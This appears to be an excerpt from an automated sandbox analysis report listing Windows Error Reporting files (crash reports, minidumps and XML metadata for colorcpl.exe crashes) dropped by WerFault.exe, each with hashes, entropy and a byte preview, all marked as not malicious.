                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.4.6.0.0.9.8.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.4.6.7.8.8.8.1.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.c.f.7.2.0.8.-.2.9.7.1.-.4.8.1.4.-.b.e.7.b.-.5.0.9.1.9.c.f.9.0.3.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.f.3.0.6.6.3.-.7.3.4.0.-.4.f.3.4.-.a.d.5.1.-.1.9.0.5.6.b.2.7.2.4.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.b.8.-.0.0.0.1.-.0.0.1.4.-.7.5.4.2.-.e.7.8.a.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9298476340274214
                                                                    Encrypted:false
                                                                    SSDEEP:192:TwZpxYxv0MAxEAQjIylZrPjzuiFsZ24IO8B:kZ/YxcMACAQjJzuiFsY4IO8B
                                                                    MD5:76B1E5EC91D888A7DC96691BF2215B65
                                                                    SHA1:A456DAA86EB007E36EF88A40BEE165E4688F5D0F
                                                                    SHA-256:81B04C0FB27C4BF68EB05EA95E31AF2FE14C89406F899FD5236E8F105E41CC38
                                                                    SHA-512:61F3AA8A4074381503F029BFCF5E7B93596B5F634605E5E54021E5301FC26F64BCD6D23BF6A36858AD68C67F4054CCDD9E98AFF4C3A4CD3156B55D405681F928
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.5.6.7.6.5.2.0.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.5.7.6.1.1.1.9.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.e.9.b.b.0.e.-.f.a.0.0.-.4.f.d.8.-.8.c.f.0.-.d.c.6.0.d.d.6.3.b.8.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.a.e.4.d.4.f.-.2.c.2.8.-.4.d.a.d.-.b.9.1.2.-.4.b.5.f.3.a.1.a.5.5.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.1.a.5.2.-.5.2.9.1.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:26 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):46950
                                                                    Entropy (8bit):2.0528010980463973
                                                                    Encrypted:false
                                                                    SSDEEP:192:QKCYRXcqXdV2k2O0e9daDHRPwPL34upx1dYHHE79CYgaYPrFu:YYl1V2kB0UaVYPL34Yx1iUCYgNFu
                                                                    MD5:4F204BD4BC9450E60A12A7431A5220CD
                                                                    SHA1:8CCBEA9011066A8EA7CDABCA8D88161C03FE66BA
                                                                    SHA-256:17E950A829DB0C131B82E5F723AD1FD9CFD59038090D25146E46993BA75B4126
                                                                    SHA-512:4B9778B30B127935471C9A6D6BA1D7337521E8DE6455A9DCA3CFBA061545D55FE304B64BAC9254B2BEE757BC858B226E7C99C57294806B251B79C0BD61F1DF29
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...............f...........0...........................................................................................eJ..............GenuineIntel............T............tEg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8384
                                                                    Entropy (8bit):3.7012991197378247
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJNL6+r46Yx86ALWjGgmfNwGfxYprx89baPsf8+m:R6lXJx6l6Ya6ALrgmfNXfla0fM
                                                                    MD5:428907974789DB8B866C20565768CA7E
                                                                    SHA1:77D08ED4A87921483D3F6BD399BFFB50E486B1AE
                                                                    SHA-256:6B067F4DF8AA73379B33041ECC63C75A26C7CD4CA5E1ACD27F1D5446868EABEB
                                                                    SHA-512:4E97741F941C899EAC325BD057666887AAB3691E9E76997372F737EB31C054C8B4116E21C94E06574B01B1400B324E3334B3DA6F91F5DD692030BBBC93DFB59E
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.8.0.<./.P.i.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4686
                                                                    Entropy (8bit):4.4831815261645716
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYoYm8M4JMDaJFP+q8nliL0V0e9d:uIjfuI7xh7VsJMDsckL0V0e9d
                                                                    MD5:688A84428A31C69EF169CEC935047655
                                                                    SHA1:D0D50510134DD9E4D3A5DA5F8BB14587A976CFD5
                                                                    SHA-256:447D59A46C78DF8D64996391D29AC762919E0A19443B25E35969245256B4C9E9
                                                                    SHA-512:435CADCA11D65FCF95CBBB61BC47F659E76F1A3359A3CE9AF5A9BCD433E11EF890B40C49E7CBD6728AA42941F57C96FB98D899A8F16CBEF59F850937DE390160
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:37 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):46882
                                                                    Entropy (8bit):2.05234672893411
                                                                    Encrypted:false
                                                                    SSDEEP:192:7SRXcqXdVXe9O0e9y0ps/eGQp2wd2DdEp1WQplYt5e+D08i:Wl1VOw0wps/eGQowIQ1WglE08
                                                                    MD5:9855477C490AFDAB2B59BDF1F73411E8
                                                                    SHA1:AF80C1E2EBAC7C1F6F4532844312A36A7CD117F4
                                                                    SHA-256:BEC4F7D05000C9CBF665542A4EFF4642FAA17C18402E1248AA48BA7736C31FD6
                                                                    SHA-512:854473FD6124909A33C63C6200D4C04B9BA91C483985B5F8007FDFDB87F3457995F12484B08B399D78DBBAE85C9CDE33D2C0FCE3E17184380F8E5AE5659C694E
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...........x...............0...........................................................................................eJ..............GenuineIntel............T............tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8372
                                                                    Entropy (8bit):3.7003524343587615
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJu16tRf6YeU6hgmfNwGfxYprs89bC2sfry2m:R6lXJ86tRf6YN6hgmfNXfiCVfrq
                                                                    MD5:59CD62E30B307C4372C3CD2AB614C600
                                                                    SHA1:2C9973C0133AD26885FA16AC82370BF226C6C9F8
                                                                    SHA-256:4DAE69A65783C4C8D0A10805A1143111DB03D9FC1A52B52F8AA121E37963FD87
                                                                    SHA-512:E71FFEF34F889216C1410ABC69BEF2EF1CE88B0EFA8E62275623195576F19A7639DD5143E16FAA79532943E0631AD36FD81F01B3976E1FA337311B8D7D3A41B3
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4686
                                                                    Entropy (8bit):4.480657334406777
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYKyYm8M4JMDaJFe+q8nlLHL0V0G9d:uIjfuI7xh7VzJMDFcBL0V0G9d
                                                                    MD5:7A1E5E7ED9CFA2732348A79C5778F59B
                                                                    SHA1:1B0F46205522FBE3F2B498A50A1CB5A2C3C3BB18
                                                                    SHA-256:BB0CFB253794CA11025AA8C46C28D2C3A3BC11995CDA6BA8B909C60B8DBE9273
                                                                    SHA-512:73CE35CFF8198A3632E7DF57749C1ABDA342901B65B75991DB330B26314312978503450D3BB6D90CE6828338474A13EAA18EF0CFD0471FBF3E6C6FB4B3953D7C
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:39 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):43218
                                                                    Entropy (8bit):2.0776634274567973
                                                                    Encrypted:false
                                                                    SSDEEP:192:pwClRXcqXdVWhO0e91TJeYpRdwPoup3dYHHE7Hdy14Hm3oX3+:Vll1Vf0sTJ32PoY3i0dy1K3+
                                                                    MD5:860331CD4832C4C333022E578C941324
                                                                    SHA1:402EDB176E54B174A4254CBA1A36B614841D1D38
                                                                    SHA-256:DB83C6CEB8F051C927CC4B0C0B3F134B76EAA794E7D61756F8B5951FBD5D7C65
                                                                    SHA-512:B299FEB1381ED38A54A356BE5FD446B07BA70AEADD8768446FEC8D401545715E63673AE57AE03DDFAE65E5C236AF3FE70E17E7E2E4BCBD585D4AF75830720AF6
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...........................0...........................................................................................eJ..............GenuineIntel............T............tEg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):6364
                                                                    Entropy (8bit):3.721683555396351
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJNc6+CkDYNwehSpDk89biRPsfcBXfABm:R6lXJG6OYNfhOiR0fcBY8
                                                                    MD5:21449DAE87F8E521DC7836EADABB668D
                                                                    SHA1:0001503F0D070530996D51A43EF0D2F121D63E27
                                                                    SHA-256:B7DF83C9A2A095C4DBAECF0180E041C99C5213F8DD3E819E582FA99193AEE765
                                                                    SHA-512:F5EA29DD101C25D1B186B11299970A6EDBDE04FE3959DCA1870865D57F63C75D773649FD8BE09CF4478F5BFC262A9D9230652CF6DF5448D594758019C3B54B73
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.8.0.<./.P.i.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4690
                                                                    Entropy (8bit):4.480444114625285
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYEYm8M4JMDaq2OqFQO+q8nNvSOAL0V0e9d:uIjfuI7xh7VIJMDx29cN63L0V0e9d
                                                                    MD5:24F892C6852BF7E1013FAA133F5D0FD8
                                                                    SHA1:47579327E5EC7BD7BE84D6735908E6D6B48BC4D8
                                                                    SHA-256:187BDF2085303616E31FCA909D88C83369CD6B885EEEE56D28F585B60B23C945
                                                                    SHA-512:FFE7B0296217BF95F5EB4467C30887E293B4B4FD69B068D4AA0321DFFF5C7A57DED381E8B9B8C0767A0119F88B9F072F4D7DBCFB92394F89D3913D42914EA304
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:43 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):43150
                                                                    Entropy (8bit):2.0783368261806165
                                                                    Encrypted:false
                                                                    SSDEEP:192:9YRXcqXdV+8O0e9+0xe9xw12DdEp1WQ/7t4TMxAtLH:+l1V+z08xe9xwQQ1WC7t4VtLH
                                                                    MD5:C64870AFD1BA6A0AB29FD72B343FCF04
                                                                    SHA1:EA7F9711B7202E9B1DC632B0208A6152E66BDB3A
                                                                    SHA-256:6939A6A78A7C57EF1AF025C1FDBC8AD4F06E2B3F4E68302CEA730150467578DB
                                                                    SHA-512:9C28D8EBA0680629538916884593841A6B06BCEF2CB2853ABD3D76C021788FA715281F66001B510F0BE0054A2820616BD114A217974345C23F0358ACB32D3E51
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...........P...>...........0...........................................................................................eJ..............GenuineIntel............T............tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):6358
                                                                    Entropy (8bit):3.721332007381041
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJuC6eMvYNwehSpD289bB2sfLrm:R6lXJL6eMvYNfhQBVfm
                                                                    MD5:E57AA7EB8A949D5DE52C6EC41F8258AE
                                                                    SHA1:3D4D82809045E2E7B134DD149551B1AF9D0A9504
                                                                    SHA-256:7D2498A259DB88F97A7B4487C5A98F9073F7318F7413714A95CF326EFAD7B80E
                                                                    SHA-512:004E82C5B8177D2F65DCAFDF322DB7E26B17F4B04DA74FA979D30501D06AE1552136CCF79054D39CA42AC522DAEE3ACD33CCCD1F179F3B54B3F38A5830BA5BCD
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4690
                                                                    Entropy (8bit):4.478447830869072
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYFzYm8M4JMDaq2OqFcSh+q8nNvyOhHL0V0G9d:uIjfuI7xh7VkmJMDx2IShcN62L0V0G9d
                                                                    MD5:14A50A80D69058F92DA76D2EE95596A5
                                                                    SHA1:34616670EC5E55B9DE7372BFF79DB25A11DFCF65
                                                                    SHA-256:D5E1C0C24AAA502EA82F6964BA4DFC3067BADE122F14A6C1DE57C74C379136A0
                                                                    SHA-512:3E14FB122113EFA4101AA8F7EE1076DDFE87FF646610B3D668A4AFCD72889769AAA2D65D351B104FBB17670F25F12679039085908225C50EBAB42859D3B94DD8
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:45 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):46174
                                                                    Entropy (8bit):2.0510837781154927
                                                                    Encrypted:false
                                                                    SSDEEP:192:T+CXFX9/2x5Y9OiBr3S3NL5SFEWjESZzar/gwzDMEzc:j+LYw23kNLwFHZzaDgwfg
                                                                    MD5:EC4B975BABF8774A7FA38EA40FE4F8B5
                                                                    SHA1:09F663393E27607A48C0916B161F3DBB1074B7D2
                                                                    SHA-256:0A1976E12F20225B1BDDE89E5EBDAB384C0FA381E9D73BA9BF863662357C0B23
                                                                    SHA-512:0167C1793F9B5931A27516C270D66938C4D2F78DFBD02B56189643163D202F567ED1AC36FDEAE8CD545495DD29689CA1D27D8F18D4BB623E0A851B3241122B92
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................*..........T.......8...........T........... ...>.......................l...............................................................................eJ..............GenuineIntel............T.......`....tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
